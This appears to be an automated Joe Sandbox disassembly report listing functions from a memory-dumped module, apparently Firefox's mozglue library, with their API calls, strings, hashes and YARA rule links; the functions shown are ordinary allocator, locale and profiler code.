API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
String ID:
API String ID: 2325513730-0
Opcode ID: c227074aaef5cc6fd2c3f825f54a7a82fa4c2f7ecc09ed85a9daf77c78d3a273
Instruction ID: d59a9d4d62074e99474b7d419c1af0355542fe23a4c051e246e7f75653769d24
Opcode Fuzzy Hash: c227074aaef5cc6fd2c3f825f54a7a82fa4c2f7ecc09ed85a9daf77c78d3a273
Instruction Fuzzy Hash: 974160307002059FCB14EF69C8D8AAE77F5EF89318F548468E50A97791EB34D805CF59

Function 6C5FCC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C5C31A7), ref: 6C5FCDDD

Strings

<jemalloc>, xrefs: 6C5FCF9F, 6C5FCFB3
: (malloc) Error in VirtualFree(), xrefs: 6C5FCFA4, 6C5FCFB8

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 4275171209-2186867486
Opcode ID: dd0bbb45aa1ebda2987c854878957b757dfe4b5ca1c69d2e0503aff968d0821a
Instruction ID: 3b0c28d126878923b15209955da3c414341ad03013cf409e5857301fddd3ebf1
Opcode Fuzzy Hash: dd0bbb45aa1ebda2987c854878957b757dfe4b5ca1c69d2e0503aff968d0821a
Instruction Fuzzy Hash: D631A6317402055BFB29EE65CC45BAE7775AB81758F20C424F625ABA80DB70E502CF99

Function 6C5CECD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

Part of subcall function 6C5CF100: LoadLibraryW.KERNEL32(shell32,?,6C63D020), ref: 6C5CF122
Part of subcall function 6C5CF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C5CF132

moz_xmalloc.MOZGLUE(00000012), ref: 6C5CED50
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5CEDAC
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C5CEDCC
CreateFileW.KERNEL32 ref: 6C5CEE08
free.MOZGLUE(00000000), ref: 6C5CEE27
free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C5CEE32

Part of subcall function 6C5CEB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C5CEBB5
Part of subcall function 6C5CEB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C5FD7F3), ref: 6C5CEBC3
Part of subcall function 6C5CEB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C5FD7F3), ref: 6C5CEBD6

Strings

\Mozilla\Firefox\SkeletonUILock-, xrefs: 6C5CEDC1

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
String ID: \Mozilla\Firefox\SkeletonUILock-
API String ID: 1980384892-344433685
Opcode ID: 121872ca4725f2ea9bc232081735533d3fb3256b6702e3aafb5eb2ae1737522c
Instruction ID: dbc3a35c1e21f317ce6ecd19c3acf40dce091f4986e472a2e143677ebdddc0b6
Opcode Fuzzy Hash: 121872ca4725f2ea9bc232081735533d3fb3256b6702e3aafb5eb2ae1737522c
Instruction Fuzzy Hash: 1851C271E05214DBDB00DFA8CC826EEB7B0AF99358F44992DE8556B740E7706948CBA3

Function 6C63A520 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C63A565

Part of subcall function 6C63A470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C63A4BE
Part of subcall function 6C63A470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C63A4D6

?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C63A65B
?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C63A6B6

Strings

z, xrefs: 6C63A6AE
0, xrefs: 6C63A5FB

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
String ID: 0$z
API String ID: 310210123-2584888582
Opcode ID: 57d8df469e0a6e630600a80f93fb3f641379bdac14aff55a8dc96896c8d51d0a
Instruction ID: fa9217e1d5df81b894691063e93726f08b92baf5fd3bc0783da1d6cac6235350
Opcode Fuzzy Hash: 57d8df469e0a6e630600a80f93fb3f641379bdac14aff55a8dc96896c8d51d0a
Instruction Fuzzy Hash: 5A414871A087459FC741DF68C480A8FBBE4BFCA354F40AA2EF49987651E730D549CB86

Function 6C609420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 6C5FAB89: EnterCriticalSection.KERNEL32(6C64E370,?,?,?,6C5C34DE,6C64F6CC,?,?,?,?,?,?,?,6C5C3284), ref: 6C5FAB94
Part of subcall function 6C5FAB89: LeaveCriticalSection.KERNEL32(6C64E370,?,6C5C34DE,6C64F6CC,?,?,?,?,?,?,?,6C5C3284,?,?,6C5E56F6), ref: 6C5FABD1

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C5D4A68), ref: 6C60945E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C609470
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C609482
__Init_thread_footer.LIBCMT ref: 6C60949F

Strings

MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C60946B
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C609459
MOZ_BASE_PROFILER_LOGGING, xrefs: 6C60947D

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
API String ID: 4042361484-1628757462
Opcode ID: 92adfeb78de334deabcc62053a2bdf03d89760a9cbca5d4ab9cf78916e9eb350
Instruction ID: 1df93ff6169b16b6cbe1c7ac1e5e99916ca9d4d2fda65a9da0547b5c4e95d727
Opcode Fuzzy Hash: 92adfeb78de334deabcc62053a2bdf03d89760a9cbca5d4ab9cf78916e9eb350
Instruction Fuzzy Hash: E8012830B0010187D714AB5EDA40ACA33B6DF0536DF05C536E906D6B42EA22D8658D5F

Function 6C5CB630 Relevance: 12.1, APIs: 8, Instructions: 128COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(?,?,?,?,6C5CB61E,?,?,?,?,?,00000000), ref: 6C5CB6AC

Part of subcall function 6C5DCA10: malloc.MOZGLUE(?), ref: 6C5DCA26

memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C5CB61E,?,?,?,?,?,00000000), ref: 6C5CB6D1
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,6C5CB61E,?,?,?,?,?,00000000), ref: 6C5CB6E3
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C5CB61E,?,?,?,?,?,00000000), ref: 6C5CB70B
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,6C5CB61E,?,?,?,?,?,00000000), ref: 6C5CB71D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,6C5CB61E), ref: 6C5CB73F
moz_xmalloc.MOZGLUE(80000023,?,?,?,6C5CB61E,?,?,?,?,?,00000000), ref: 6C5CB760
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,6C5CB61E,?,?,?,?,?,00000000), ref: 6C5CB79A

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemalloc
String ID:
API String ID: 1394714614-0
Opcode ID: e4b4aff44a01c519b9e6430973b3108d7c4abd9f0a2084df8af1838e9a5b82ed
Instruction ID: 4edf0fa52a92d84cb9c008f34ea12eee612482a360916a5540f5b5b6423ff645
Opcode Fuzzy Hash: e4b4aff44a01c519b9e6430973b3108d7c4abd9f0a2084df8af1838e9a5b82ed
Instruction Fuzzy Hash: 5541B6B2E001159FCB04EFA8DC806AEB7F5FB85324F250669E825E7780E731AD1487D6

Function 6C63B540 Relevance: 12.1, APIs: 8, Instructions: 93COMMON

Download Yara Rule

APIs

?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6C63B5B9
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C63B5C5
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C63B5DA
??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C63B5F4
__Init_thread_footer.LIBCMT ref: 6C63B605
?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6C63B61F
std::_Facet_Register.LIBCPMT ref: 6C63B631
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C63B655

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
String ID:
API String ID: 1276798925-0
Opcode ID: 618b3f60c41178d0e50cf357984c608d3d38a058c7339ac125fa64fc0fd82250
Instruction ID: 1479cd522143159eadecc77e8c81b0739fd9ea4a0775f0665f34cbca85d0dcc9
Opcode Fuzzy Hash: 618b3f60c41178d0e50cf357984c608d3d38a058c7339ac125fa64fc0fd82250
Instruction Fuzzy Hash: 5C318471B00514CBCB04EF6AC8949AEB7F5EBC6329F148565D91697740DB30A806CF9A

Function 6C606590 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 342COMMON

Download Yara Rule

APIs

Part of subcall function 6C5FFA80: GetCurrentThreadId.KERNEL32 ref: 6C5FFA8D
Part of subcall function 6C5FFA80: AcquireSRWLockExclusive.KERNEL32(6C64F448), ref: 6C5FFA99

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C606727
?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6C6067C8

Part of subcall function 6C614290: memcpy.VCRUNTIME140(?,?,6C622003,6C620AD9,?,6C620AD9,00000000,?,6C620AD9,?,00000004,?,6C621A62,?,6C622003,?), ref: 6C6142C4

Strings

vdl, xrefs: 6C60696C
data, xrefs: 6C606593

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
String ID: data$vdl
API String ID: 511789754-386935523
Opcode ID: 9657c0aae4ea4bab5da6ce231ef095c7bc34d3e7e0b3299bce983c80f214cd52
Instruction ID: cc8f291558a76bfb942bf7833422889ecfb901b461604aaa7b13aaeec9e503ec
Opcode Fuzzy Hash: 9657c0aae4ea4bab5da6ce231ef095c7bc34d3e7e0b3299bce983c80f214cd52
Instruction Fuzzy Hash: 7CD1BE75A083408FD724DF29C851B9BB7F1AFC5308F10892DE48997B51EB30E849CB5A

Function 6C5FD5D0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 279COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C5CEB57,?,?,?,?,?,?,?,?,?), ref: 6C5FD652
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C5CEB57,?), ref: 6C5FD660
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C5CEB57,?), ref: 6C5FD673
free.MOZGLUE(?), ref: 6C5FD888

Strings

W\l, xrefs: 6C5FD5D9, 6C5FD63F
|Enabled, xrefs: 6C5FD81E

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: free$memsetmoz_xmalloc
String ID: W\l$|Enabled
API String ID: 4142949111-1860622590
Opcode ID: 5e7139faa8ed94366c1ad6c6087c676445bf48dc9659d2f963a09a1a21b25b95
Instruction ID: cd282508b4fbb44e8c79b7e829fb55910c83f5f3d316a6671a10ca1758c25ac4
Opcode Fuzzy Hash: 5e7139faa8ed94366c1ad6c6087c676445bf48dc9659d2f963a09a1a21b25b95
Instruction Fuzzy Hash: 6EA1F370A01308CFDB15DF69C8907AEBBF1AF4A318F14845CD8A9AB741D735A846CFA1

Function 6C611D00 Relevance: 10.6, APIs: 7, Instructions: 115threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C611D0F
AcquireSRWLockExclusive.KERNEL32(?,?,6C611BE3,?,?,6C611D96,00000000), ref: 6C611D18
ReleaseSRWLockExclusive.KERNEL32(?,?,6C611BE3,?,?,6C611D96,00000000), ref: 6C611D4C
GetCurrentThreadId.KERNEL32 ref: 6C611DB7
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C611DC0
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C611DDA

Part of subcall function 6C611EF0: GetCurrentThreadId.KERNEL32 ref: 6C611F03
Part of subcall function 6C611EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6C611DF2,00000000,00000000), ref: 6C611F0C
Part of subcall function 6C611EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6C611F20

moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6C611DF4

Part of subcall function 6C5DCA10: malloc.MOZGLUE(?), ref: 6C5DCA26

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
String ID:
API String ID: 1880959753-0
Opcode ID: 2f6ae25598b91b889b5ea630525f77278e85f147f7f20f35b57fc5501f597155
Instruction ID: a030ac78bec3b4807dd6536e98538d4175c4751960b50d0c5b102e5a873f91e1
Opcode Fuzzy Hash: 2f6ae25598b91b889b5ea630525f77278e85f147f7f20f35b57fc5501f597155
Instruction Fuzzy Hash: FB418BB56047049FCB10DF29C888A5ABBF9FF89318F10846DE95A87B41CB71F814CB99

Function 6C6084E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6084F3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C60850A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C60851E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C60855B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C60856F
??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6085AC

Part of subcall function 6C607670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C6085B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C60767F
Part of subcall function 6C607670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C6085B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C607693
Part of subcall function 6C607670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C6085B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6076A7

free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6085B2

Part of subcall function 6C5E5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C5E5EDB
Part of subcall function 6C5E5E90: memset.VCRUNTIME140(ewbl,000000E5,?), ref: 6C5E5F27
Part of subcall function 6C5E5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C5E5FB2

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
String ID:
API String ID: 2666944752-0
Opcode ID: 971c5d308855dfda1ad7c7dfbbf38e67c9430c7d09c86c9db0d4b9c61c6797c9
Instruction ID: 60617095c7f1371ff721013b98745b418f7a3bde70f5c1420839065037e7667c
Opcode Fuzzy Hash: 971c5d308855dfda1ad7c7dfbbf38e67c9430c7d09c86c9db0d4b9c61c6797c9
Instruction Fuzzy Hash: 6C21A3743006019FDB19DF25C888A5A77B5AF8930DF24882DE55BD3B41DB32F948CB59

Function 6C5D1640 Relevance: 10.6, APIs: 7, Instructions: 77COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,00000114), ref: 6C5D1699
VerSetConditionMask.NTDLL ref: 6C5D16CB
VerSetConditionMask.NTDLL ref: 6C5D16D7
VerSetConditionMask.NTDLL ref: 6C5D16DE
VerSetConditionMask.NTDLL ref: 6C5D16E5
VerSetConditionMask.NTDLL ref: 6C5D16EC
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C5D16F9

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: ConditionMask$InfoVerifyVersionmemset
String ID:
API String ID: 375572348-0
Opcode ID: 67577ebe49d17a3ccec59061c3a02b290e4df63e0576019460d4237ec7c7040e
Instruction ID: 23cee11a65e2504c8b69f99396196c1f5b04b2deaa21d13bf2f59a05d4a61989
Opcode Fuzzy Hash: 67577ebe49d17a3ccec59061c3a02b290e4df63e0576019460d4237ec7c7040e
Instruction Fuzzy Hash: 1A2105B07443086FEB10AA69CC85FBBB37CDFC6714F018528F6059B5C0C675AD54C6A9

Function 6C60F5B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C5FCBE8: GetCurrentProcess.KERNEL32(?,6C5C31A7), ref: 6C5FCBF1
Part of subcall function 6C5FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C5C31A7), ref: 6C5FCBFA

Part of subcall function 6C609420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C5D4A68), ref: 6C60945E
Part of subcall function 6C609420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C609470
Part of subcall function 6C609420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C609482
Part of subcall function 6C609420: __Init_thread_footer.LIBCMT ref: 6C60949F

GetCurrentThreadId.KERNEL32 ref: 6C60F619
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C60F598), ref: 6C60F621

Part of subcall function 6C6094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6094EE
Part of subcall function 6C6094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C609508

GetCurrentThreadId.KERNEL32 ref: 6C60F637
AcquireSRWLockExclusive.KERNEL32(6C64F4B8,?,?,00000000,?,6C60F598), ref: 6C60F645
ReleaseSRWLockExclusive.KERNEL32(6C64F4B8,?,?,00000000,?,6C60F598), ref: 6C60F663

Strings

[D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C60F62A

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
API String ID: 1579816589-753366533
Opcode ID: 043f63798c2b444865e288ebabb86b427423d5d651e607e537e082cbfa119955
Instruction ID: 9a92f19a6610737584b725332530df99a0d0ceb9258de24e5a05393cdbc1f128
Opcode Fuzzy Hash: 043f63798c2b444865e288ebabb86b427423d5d651e607e537e082cbfa119955
Instruction Fuzzy Hash: 5711C475301604ABCB08BF1AD984D99777AFFC636CF508015EA0593F01CB31A811CBAE

Function 6C6276C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 6C6276F2
moz_xmalloc.MOZGLUE(00000001), ref: 6C627705

Part of subcall function 6C5DCA10: malloc.MOZGLUE(?), ref: 6C5DCA26

memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C627717
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6C62778F,00000000,00000000,00000000,00000000), ref: 6C627731
free.MOZGLUE(00000000), ref: 6C627760

Strings

}>`l, xrefs: 6C6276C4

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
String ID: }>`l
API String ID: 2538299546-3072141587
